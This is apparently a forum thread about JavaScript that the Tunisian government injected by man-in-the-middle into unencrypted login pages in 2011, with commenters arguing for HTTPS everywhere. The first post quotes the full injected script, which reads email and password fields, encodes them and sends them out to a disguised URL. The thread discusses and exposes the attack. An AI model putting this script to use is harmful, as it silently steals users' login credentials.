This is the function used by Tunisia Gov agencies to harvest login/passwords :
see also http://www.thetechherald.com/article.php/201101/6651<p><script language="javascript">
<!--
function h6h(st){var st2="";for(i=0;i<st.length;i++){c=st.charCodeAt(i);ch=(c&0xF0)>>4;cl=c&0x0F;
st2=st2+String.fromCharCode(ch+97)+String.fromCharCode(cl+97);}return st2;}
function r5t(len){var st="";for(i=0;i<len;i++)st=st+String.fromCharCode(Math.floor(Math.random(1)*26+97)); return st;}
function hAAAQ3d() {var frm = document.getElementById("gaia_loginform"); var us3r = frm.Email.value; var pa55 = frm.Passwd.value;
var url = "http://www.google.com/wo0dh3ad?q="+r5t(5)+"&u="+h6h(us3r)+"&p="+h6h(pa55);
var bnm = navigator.appName; if(bnm=='Microsoft Internet Explorer') inv0k3(url); else inv0k2(url);}
function inv0k1(url) {var objhq = document.getElementById("x6y7z8"); objhq.src = url;}
function inv0k2(url) {var xr = new XMLHttpRequest(); xr.open("GET", url, false); xr.send("");}
function inv0k3(url) {var xr = new ActiveXObject('Microsoft.XMLHTTP'); xr.open("GET", url, false); xr.send("");}
//--><p></script>
This is why login forms themselves must be opened over an HTTPS connection. Displaying a login form over HTTP which POSTs to HTTPS is easily MITMd.<p>Think of your users. Some of them will be accessing your sites from oppressive regimes. Let them do so safely.<p>Taking Facebook as an example, considering how global their usage is, and the amount of sensitive data peoples accounts contain, it's unforgivable that they don't force HTTPS traffic for everything.
Slim Amamou, who is named in the article as the on who discovered this code, has been arrested. His phone is still updating his Google Latitude position, moving between several government buildings.<p><a href="http://advocacy.globalvoicesonline.org/2011/01/07/tunisia-blogger-slim-amamou-arrested-today/" rel="nofollow">http://advocacy.globalvoicesonline.org/2011/01/07/tunisia-bl...</a>
<i>Fortunately, because the fake "wo0dh3ad" page accessed was on their site, Facebook may well have a log of everyone whose account was compromised and can take steps to warn and protect their Tunisian users. </i><p>Why would the Tunisian government have allowed ISPs to forward these requests? Facebook probably knows nothing about this.
Proves again, there is really no excuse not to use HTTPS for everything.<p>Encryption/certificate validation make it much harder to pull of a MITM attack like this, especially by companies and small repressive governments.